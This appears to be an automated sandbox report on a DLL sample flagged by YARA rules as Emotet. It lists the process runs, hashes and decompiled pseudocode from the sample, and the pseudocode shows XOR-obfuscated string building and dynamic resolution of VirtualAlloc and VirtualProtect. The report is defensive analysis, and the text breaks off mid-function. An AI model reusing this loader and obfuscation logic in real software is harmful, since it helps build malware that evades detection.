Analysis Process: rundll32.exe PID: 6376 Parent PID: 6692

General

Start time:	15:24:14
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq
Imagebase:	0x80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6752 Parent PID: 6692

General

Start time:	15:24:18
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju
Imagebase:	0x80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6692 Parent PID: 5724 loaddll32.exeCOMMON

Executed Functions

Function 6EA52A10, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220
libraryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E6EA52A10() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				CHAR* _v96;
				intOrPtr* _v100;
				intOrPtr* _t87;
				char _t88;
				intOrPtr _t91;
				intOrPtr* _t93;
				struct HINSTANCE__* _t94;
				signed int _t96;
				signed int _t102;
				signed int _t108;
				signed int _t114;
				signed int _t117;
				signed int _t119;
				signed int _t123;
				signed char _t127;
				signed char _t128;
				signed char _t130;
				signed char _t131;
				signed char _t132;
				signed char _t133;
				intOrPtr* _t134;
				intOrPtr _t136;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t146;
				signed int _t148;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				intOrPtr* _t167;
				intOrPtr* _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr* _t175;
				signed int _t176;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t186;
				void* _t188;

				_t188 = (_t186 & 0xfffffff8) - 0x64;
				_t134 = 0x6ea94180;
				_v92 = 0xf;
				_v100 = 0x6ea94180;
				do {
					_t127 =  *_t134;
					_t87 = _t134 + 0x100;
					_t157 = 0;
					_v96 = _t87;
					_t172 = _t134;
					if(_t127 != 0) {
						do {
							_t5 = _t127 + 0x20; // 0x20
							_t172 = _t172 + 1;
							_t123 = _t127 & 0x000000ff;
							_t127 =  *_t172;
							_t156 =  >=  ? _t123 : _t5 & 0x000000ff;
							_t124 =  >=  ? _t123 : _t5 & 0x000000ff;
							_t157 = _t157 * 0x00000101 + ( >=  ? _t123 : _t5 & 0x000000ff) ^ ( >=  ? _t123 : _t5 & 0x000000ff) << 0x00000010;
						} while (_t127 != 0);
						_t87 = _v96;
					}
					_t128 =  *_t87;
					_t173 = 0;
					_t167 = _t87;
					if(_t128 != 0) {
						asm("o16 nop [eax+eax]");
						do {
							_t8 = _t128 + 0x20; // 0x20
							_t167 = _t167 + 1;
							_t119 = _t128 & 0x000000ff;
							_t128 =  *_t167;
							_t154 =  >=  ? _t119 : _t8 & 0x000000ff;
							_t120 =  >=  ? _t119 : _t8 & 0x000000ff;
							_t173 = _t173 * 0x00000101 + ( >=  ? _t119 : _t8 & 0x000000ff) ^ ( >=  ? _t119 : _t8 & 0x000000ff) << 0x00000010;
						} while (_t128 != 0);
					}
					_t88 = E6EA528D0(_t173, _t157);
					if(_t88 == 0) {
						_v84 = _t88;
						_v80 = 0x215e9a10;
						_v76 = 0x375d9c10;
						_v72 = 0x446873d;
						_v68 = 0x453ff55c;
						if(_v84 == 0) {
							_t117 = 0;
							do {
								 *(_t188 + 0x24 + _t117 * 4) =  *(_t188 + 0x24 + _t117 * 4) ^ 0x453ff55c;
								_t117 = _t117 + 1;
							} while (_t117 < 4);
						}
						_t130 = _v80;
						_t175 =  &_v80;
						_t158 = 0;
						while(_t130 != 0) {
							_t25 = _t130 + 0x20; // 0x215e9a30
							_t175 = _t175 + 1;
							_t114 = _t130 & 0x000000ff;
							_t130 =  *_t175;
							_t150 =  >=  ? _t114 : _t25 & 0x000000ff;
							_t115 =  >=  ? _t114 : _t25 & 0x000000ff;
							_t158 = _t158 * 0x00000101 + ( >=  ? _t114 : _t25 & 0x000000ff) ^ ( >=  ? _t114 : _t25 & 0x000000ff) << 0x00000010;
						}
						_v64 = 0;
						_v60 = 0x41f5d866;
						_v56 = 0x3d94d168;
						_v52 = 0x43ebd903;
						_v48 = 0xfa79d2d;
						if(_v64 == 0) {
							_t148 = 0;
							do {
								 *(_t188 + 0x38 + _t148 * 4) =  *(_t188 + 0x38 + _t148 * 4) ^ 0x0fa79d2d;
								_t148 = _t148 + 1;
							} while (_t148 < 4);
						}
						_t131 = _v60;
						_t169 =  &_v60;
						_t176 = 0;
						while(_t131 != 0) {
							_t146 = _t131 + 0x00000020 & 0x000000ff;
							_t169 = _t169 + 1;
							_t108 = _t131 & 0x000000ff;
							_t131 =  *_t169;
							_t147 =  >=  ? _t108 : _t146;
							_t109 =  >=  ? _t108 : _t146;
							_t176 = _t176 * 0x00000101 + ( >=  ? _t108 : _t146) ^ ( >=  ? _t108 : _t146) << 0x00000010;
						}
						_t91 = E6EA528D0(_t176, _t158);
						_v44 = 0;
						_v40 = 0x59c0b6da;
						_v36 = 0x48d7bcef;
						_v32 = 0x6cc6b7f9;
						_v28 = 0x9b4a0ee;
						_v88 = _t91;
						if(_v44 == 0) {
							_t145 = 0;
							asm("o16 nop [eax+eax]");
							do {
								 *(_t188 + 0x4c + _t145 * 4) =  *(_t188 + 0x4c + _t145 * 4) ^ 0x09b4d39d;
								_t145 = _t145 + 1;
							} while (_t145 < 4);
						}
						_t132 = _v40;
						_t177 =  &_v40;
						_t159 = 0;
						while(_t132 != 0) {
							_t60 = _t132 + 0x20; // 0x59c0b6fa
							_t177 = _t177 + 1;
							_t102 = _t132 & 0x000000ff;
							_t132 =  *_t177;
							_t144 =  >=  ? _t102 : _t60 & 0x000000ff;
							_t103 =  >=  ? _t102 : _t60 & 0x000000ff;
							_t159 = _t159 * 0x00000101 + ( >=  ? _t102 : _t60 & 0x000000ff) ^ ( >=  ? _t102 : _t60 & 0x000000ff) << 0x00000010;
						}
						_v24 = 0;
						_v20 = 0x24572e4f;
						_v16 = 0x58362741;
						_v12 = 0x26492f2a;
						_v8 = 0x6a056b04;
						if(_v24 == 0) {
							_t142 = 0;
							do {
								 *(_t188 + 0x60 + _t142 * 4) =  *(_t188 + 0x60 + _t142 * 4) ^ 0x6a056b04;
								_t142 = _t142 + 1;
							} while (_t142 < 4);
						}
						_t133 = _v20;
						_t170 =  &_v20;
						_t178 = 0;
						while(_t133 != 0) {
							_t140 = _t133 + 0x00000020 & 0x000000ff;
							_t170 = _t170 + 1;
							_t96 = _t133 & 0x000000ff;
							_t133 =  *_t170;
							_t141 =  >=  ? _t96 : _t140;
							_t97 =  >=  ? _t96 : _t140;
							_t178 = _t178 * 0x00000101 + ( >=  ? _t96 : _t140) ^ ( >=  ? _t96 : _t140) << 0x00000010;
						}
						_t93 = E6EA528D0(_t178, _t159);
						_t94 = LoadLibraryA(_v96);
						_t88 =  *_t93(_t94, _v100);
					}
					_t136 = _v100;
					 *((intOrPtr*)(_t136 + 0x200)) = _t88;
					_t134 = _t136 + 0x204;
					_t84 =  &_v92;
					 *_t84 = _v92 - 1;
					_v100 = _t134;
				} while ( *_t84 != 0);
				return _t88;
			}

0x6ea52a16
0x6ea52a1b
0x6ea52a20
0x6ea52a29
0x6ea52a30
0x6ea52a30
0x6ea52a32
0x6ea52a38
0x6ea52a3a
0x6ea52a3e
0x6ea52a42
0x6ea52a44
0x6ea52a44
0x6ea52a4d
0x6ea52a50
0x6ea52a53
0x6ea52a55
0x6ea52a5e
0x6ea52a66
0x6ea52a68
0x6ea52a6c
0x6ea52a6c
0x6ea52a70
0x6ea52a72
0x6ea52a74
0x6ea52a78
0x6ea52a7a
0x6ea52a80
0x6ea52a80
0x6ea52a89
0x6ea52a8c
0x6ea52a8f
0x6ea52a91
0x6ea52a9a
0x6ea52aa2
0x6ea52aa4
0x6ea52a80
0x6ea52aaa
0x6ea52ab1
0x6ea52ab7
0x6ea52abb
0x6ea52ac3
0x6ea52acb
0x6ea52ad3
0x6ea52ae4
0x6ea52ae6
0x6ea52af0
0x6ea52afa
0x6ea52afe
0x6ea52aff
0x6ea52af0
0x6ea52b04
0x6ea52b08
0x6ea52b0c
0x6ea52b10
0x6ea52b12
0x6ea52b1b
0x6ea52b1e
0x6ea52b21
0x6ea52b23
0x6ea52b2c
0x6ea52b34
0x6ea52b36
0x6ea52b3a
0x6ea52b3f
0x6ea52b47
0x6ea52b4f
0x6ea52b57
0x6ea52b68
0x6ea52b6a
0x6ea52b70
0x6ea52b79
0x6ea52b7d
0x6ea52b7e
0x6ea52b70
0x6ea52b83
0x6ea52b87
0x6ea52b8b
0x6ea52b8f
0x6ea52b97
0x6ea52b9a
0x6ea52b9d
0x6ea52ba0
0x6ea52ba2
0x6ea52bab
0x6ea52bb3
0x6ea52bb5
0x6ea52bbb
0x6ea52bc0
0x6ea52bc5
0x6ea52bcd
0x6ea52bd5
0x6ea52bdd
0x6ea52bee
0x6ea52bf2
0x6ea52bf4
0x6ea52bf6
0x6ea52c00
0x6ea52c09
0x6ea52c0d
0x6ea52c0e
0x6ea52c00
0x6ea52c13
0x6ea52c17
0x6ea52c1b
0x6ea52c1f
0x6ea52c21
0x6ea52c2a
0x6ea52c2d
0x6ea52c30
0x6ea52c32
0x6ea52c3b
0x6ea52c43
0x6ea52c45
0x6ea52c49
0x6ea52c4e
0x6ea52c56
0x6ea52c5e
0x6ea52c66
0x6ea52c77
0x6ea52c79
0x6ea52c80
0x6ea52c89
0x6ea52c8d
0x6ea52c8e
0x6ea52c80
0x6ea52c93
0x6ea52c97
0x6ea52c9b
0x6ea52c9f
0x6ea52ca7
0x6ea52caa
0x6ea52cad
0x6ea52cb0
0x6ea52cb2
0x6ea52cbb
0x6ea52cc3
0x6ea52cc5
0x6ea52ccb
0x6ea52cd6
0x6ea52cdf
0x6ea52cdf
0x6ea52ce1
0x6ea52ce5
0x6ea52ceb
0x6ea52cf1
0x6ea52cf1
0x6ea52cf6
0x6ea52cf6
0x6ea52d06

APIs

LoadLibraryA.KERNELBASE(0000000F), ref: 6EA52CD6

Strings

A'6X, xrefs: 6EA52C56
*/I&, xrefs: 6EA52C5E
VirtualAlloc, xrefs: 6EA52A1B
O.W$, xrefs: 6EA52C4E

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: */I&$A'6X$O.W$$VirtualAlloc
API String ID: 1029625771-4117336556
Opcode ID: 0a41dcce04e699e702cac102067ef36450af0aa17eff7209afc6ca0f5b7aac4b
Instruction ID: ec2a688c74748cebee10e8dfacf1ebbe45163bea2064fbe878ca74c37cb12cac
Opcode Fuzzy Hash: 0a41dcce04e699e702cac102067ef36450af0aa17eff7209afc6ca0f5b7aac4b
Instruction Fuzzy Hash: 778103716493918FD304DF3480603ABBBF6AF86344F49096DE8C19B282D775D899CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA52570, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a27cb5d298e5dd1b4c9dbf2ce3aff55a4cf3166bb89c97db7b0d0af6a8d8aa
Instruction ID: 2194bfb4aee6c2fdcc4cb9d93dce1340457ce0804b323fe62a164bda4253f03c
Opcode Fuzzy Hash: d5a27cb5d298e5dd1b4c9dbf2ce3aff55a4cf3166bb89c97db7b0d0af6a8d8aa
Instruction Fuzzy Hash: C36105318287508FE306CF3DC04176ABBF8BB96754F108A6EE8D26B351D7788496CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5824D, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6EA5824D() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x6ea93f20 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6ea94144; // 0xf89d08
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x6ea58252
0x6ea58254
0x6ea58258
0x6ea58261
0x6ea5826c
0x6ea5827c
0x6ea58280
0x6ea58283
0x6ea58295
0x6ea58285
0x6ea58288
0x6ea58291
0x6ea5828a
0x6ea5828d
0x6ea5828d
0x6ea58288
0x6ea58297
0x6ea5829f
0x6ea582a4
0x6ea582b3
0x6ea582aa
0x6ea582ab
0x6ea582ab
0x6ea582b7
0x6ea582d5
0x6ea582d9
0x6ea582e0
0x6ea582e7
0x6ea582e9
0x6ea582ec
0x6ea582ec
0x6ea582b9
0x6ea582b9
0x6ea582bc
0x6ea582c2
0x6ea582cd
0x6ea582cf
0x6ea582cf
0x6ea582c4
0x6ea582c4
0x6ea582c4
0x6ea582c2
0x6ea58274
0x6ea58274
0x6ea58274
0x6ea582f3
0x6ea582f4
0x6ea58300

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6EA58299
GetFileType.KERNELBASE(00000000), ref: 6EA582AB

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6a44146110a5261ec7d45056ccb01fa908f9e4014f9a4f4746416b83d6c03ce7
Instruction ID: d6e531706fb0d3851522c145948439347c4a3a310a7d4c20a676cd2565743589
Opcode Fuzzy Hash: 6a44146110a5261ec7d45056ccb01fa908f9e4014f9a4f4746416b83d6c03ce7
Instruction Fuzzy Hash: F911B771624F528AD7604DBF8C9871ABE94A747230B380F39D1B6D63E1C630D8D6C54C

Uniqueness

Uniqueness Score: -1.00%

Function 6EA55D2F, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA55D2F(void* __eax, void* __ebx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6ea55d34

APIs

Part of subcall function 6EA57BBF: GetEnvironmentStringsW.KERNEL32 ref: 6EA57BC8
Part of subcall function 6EA57BBF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA57BEB
Part of subcall function 6EA57BBF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6EA57C11
Part of subcall function 6EA57BBF: _free.LIBCMT ref: 6EA57C24
Part of subcall function 6EA57BBF: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA57C33

_free.LIBCMT ref: 6EA55D6F
_free.LIBCMT ref: 6EA55D76

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 1e5d4fdadd50294ec112c2332528fb8f86b87e1673354b70edd4b9ccf8811ef9
Instruction ID: ba67990607ffec161a8091002d5a4ae84bdbcdf81674f804b7b8437a1fa22455
Opcode Fuzzy Hash: 1e5d4fdadd50294ec112c2332528fb8f86b87e1673354b70edd4b9ccf8811ef9
Instruction Fuzzy Hash: 16E0E523955D100B962196FEA84C28A16585F83339B26476AE864DB3C1EF7488EB009D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EA51000, Relevance: 43.6, Strings: 34, Instructions: 1055
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E6EA51000(void* __edi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				char _v436;
				char _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				char _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				char _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				char _v596;
				char _v600;
				char* _t513;
				char* _t514;
				char* _t518;
				char* _t519;
				char* _t523;
				char* _t524;
				char* _t528;
				char* _t529;
				char* _t533;
				char* _t534;
				char* _t538;
				char* _t539;
				char* _t543;
				char* _t544;
				char* _t548;
				char* _t549;
				char* _t553;
				char* _t554;
				char* _t558;
				char* _t559;
				char* _t563;
				char* _t564;
				char* _t568;
				char* _t569;
				char* _t573;
				char* _t574;
				char* _t578;
				char* _t579;
				char* _t583;
				char* _t584;
				void* _t705;
				void* _t707;
				void* _t709;
				void* _t711;
				void* _t713;
				void* _t715;
				void* _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;
				void* _t727;
				void* _t729;
				void* _t731;
				void* _t733;
				void* _t735;
				void* _t737;
				void* _t739;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t747;
				void* _t749;
				void* _t751;
				void* _t753;
				void* _t755;
				void* _t757;
				void* _t759;
				void* _t761;
				void* _t763;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				void* _t795;
				signed int _t796;
				void* _t798;
				void* _t799;
				void* _t800;
				void* _t801;
				void* _t802;
				void* _t803;
				void* _t804;
				void* _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t810;
				void* _t811;
				void* _t812;
				void* _t813;

				_t795 = __edi;
				_t798 = (_t796 & 0xfffffff8) - 0x258;
				_v500 = 0;
				_v496 = 0x1e388d85;
				_v492 = 0x6259848b;
				_v488 = 0x3c06ace0;
				_v484 = 0x506ac8ce;
				if(_v500 == 0) {
					_t794 = 0;
					do {
						 *(_t798 + 0x6c + _t794 * 4) =  *(_t798 + 0x6c + _t794 * 4) ^ 0x506ac8ce;
						_t794 = _t794 + 1;
					} while (_t794 < 4);
				}
				_v520 = 0;
				_v516 = 0x4ac2813d;
				_v512 = 0x7fdc891e;
				_v508 = 0x5ddf8407;
				_v504 = 0x3eb0e86b;
				if(_v520 == 0) {
					_t793 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t798 + 0x58 + _t793 * 4) =  *(_t798 + 0x58 + _t793 * 4) ^ 0x3eb0e86b;
						_t793 = _t793 + 1;
					} while (_t793 < 4);
				}
				E6EA54050(_t795, "VirtualAlloc", 0, 0x200);
				_t705 = 0;
				 *0x6ea94380 = 0;
				_t799 = _t798 + 0xc;
				_t513 =  &_v516;
				if(_v516 != 0) {
					do {
						_t513 = _t513 + 1;
						_t705 = _t705 + 1;
					} while ( *_t513 != 0);
				}
				_t706 = _t705 + 1;
				if(_t705 + 1 != 0) {
					E6EA54940("VirtualAlloc",  &_v516, _t706);
					_t799 = _t799 + 0xc;
				}
				_t707 = 0;
				_t514 =  &_v496;
				if(_v496 != 0) {
					do {
						_t514 = _t514 + 1;
						_t707 = _t707 + 1;
					} while ( *_t514 != 0);
				}
				_t708 = _t707 + 1;
				if(_t707 + 1 != 0) {
					E6EA54940("KERNEL32.dll",  &_v496, _t708);
					_t799 = _t799 + 0xc;
				}
				_v460 = 0;
				_v456 = 0x6c6bb2de;
				_v452 = 0x100abbd0;
				_v448 = 0x4e5593bb;
				_v444 = 0x2239f795;
				if(_v460 == 0) {
					_t792 = 0;
					do {
						 *(_t799 + 0x94 + _t792 * 4) =  *(_t799 + 0x94 + _t792 * 4) ^ 0x2239f795;
						_t792 = _t792 + 1;
					} while (_t792 < 4);
				}
				_v480 = 0;
				_v476 = 0x66d72535;
				_v472 = 0x42c92d16;
				_v468 = 0x77d12311;
				_v464 = 0x12a53800;
				if(_v480 == 0) {
					_t791 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t799 + 0x80 + _t791 * 4) =  *(_t799 + 0x80 + _t791 * 4) ^ 0x12a54c63;
						_t791 = _t791 + 1;
					} while (_t791 < 4);
				}
				E6EA54050(_t795, "VirtualProtect", 0, 0x200);
				_t709 = 0;
				 *0x6ea94584 = 0;
				_t800 = _t799 + 0xc;
				_t518 =  &_v476;
				if(_v476 != 0) {
					do {
						_t518 = _t518 + 1;
						_t709 = _t709 + 1;
					} while ( *_t518 != 0);
				}
				_t710 = _t709 + 1;
				if(_t709 + 1 != 0) {
					E6EA54940("VirtualProtect",  &_v476, _t710);
					_t800 = _t800 + 0xc;
				}
				_t711 = 0;
				_t519 =  &_v456;
				if(_v456 != 0) {
					do {
						_t519 = _t519 + 1;
						_t711 = _t711 + 1;
					} while ( *_t519 != 0);
				}
				_t712 = _t711 + 1;
				if(_t711 + 1 != 0) {
					E6EA54940("KERNEL32.dll",  &_v456, _t712);
					_t800 = _t800 + 0xc;
				}
				_v420 = 0;
				_v416 = 0x6f65900d;
				_v412 = 0x13049903;
				_v408 = 0x4d5bb168;
				_v404 = 0x2137d546;
				if(_v420 == 0) {
					_t790 = 0;
					do {
						 *(_t800 + 0xbc + _t790 * 4) =  *(_t800 + 0xbc + _t790 * 4) ^ 0x2137d546;
						_t790 = _t790 + 1;
					} while (_t790 < 4);
				}
				_v440 = 0;
				_v436 = 0x7fdf3e65;
				_v432 = 0x5ac13646;
				_v428 = 0x72df3246;
				_v424 = 0xbad5733;
				if(_v440 == 0) {
					_t789 = 0;
					do {
						 *(_t800 + 0xa8 + _t789 * 4) =  *(_t800 + 0xa8 + _t789 * 4) ^ 0x0bad5733;
						_t789 = _t789 + 1;
					} while (_t789 < 4);
				}
				E6EA54050(_t795, "VirtualQuery", 0, 0x200);
				_t713 = 0;
				 *0x6ea94788 = 0;
				_t801 = _t800 + 0xc;
				_t523 =  &_v436;
				if(_v436 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t523 = _t523 + 1;
						_t713 = _t713 + 1;
					} while ( *_t523 != 0);
				}
				_t714 = _t713 + 1;
				if(_t713 + 1 != 0) {
					E6EA54940("VirtualQuery",  &_v436, _t714);
					_t801 = _t801 + 0xc;
				}
				_t715 = 0;
				_t524 =  &_v416;
				if(_v416 != 0) {
					do {
						_t524 = _t524 + 1;
						_t715 = _t715 + 1;
					} while ( *_t524 != 0);
				}
				_t716 = _t715 + 1;
				if(_t715 + 1 != 0) {
					E6EA54940("KERNEL32.dll",  &_v416, _t716);
					_t801 = _t801 + 0xc;
				}
				_v400 = 0;
				_v396 = 0x5a37a1c6;
				_v392 = 0x2656a8c8;
				_v388 = 0x780980a3;
				_v384 = 0x1465e48d;
				if(_v400 == 0) {
					_t788 = 0;
					do {
						 *(_t801 + 0xd0 + _t788 * 4) =  *(_t801 + 0xd0 + _t788 * 4) ^ 0x1465e48d;
						_t788 = _t788 + 1;
					} while (_t788 < 4);
				}
				_v600 = 0;
				_v596 = 0x2ce08ffd;
				_v592 = 0x1efe87de;
				_v588 = 0x58f783d9;
				if(_v600 == 0) {
					_t787 = 0;
					do {
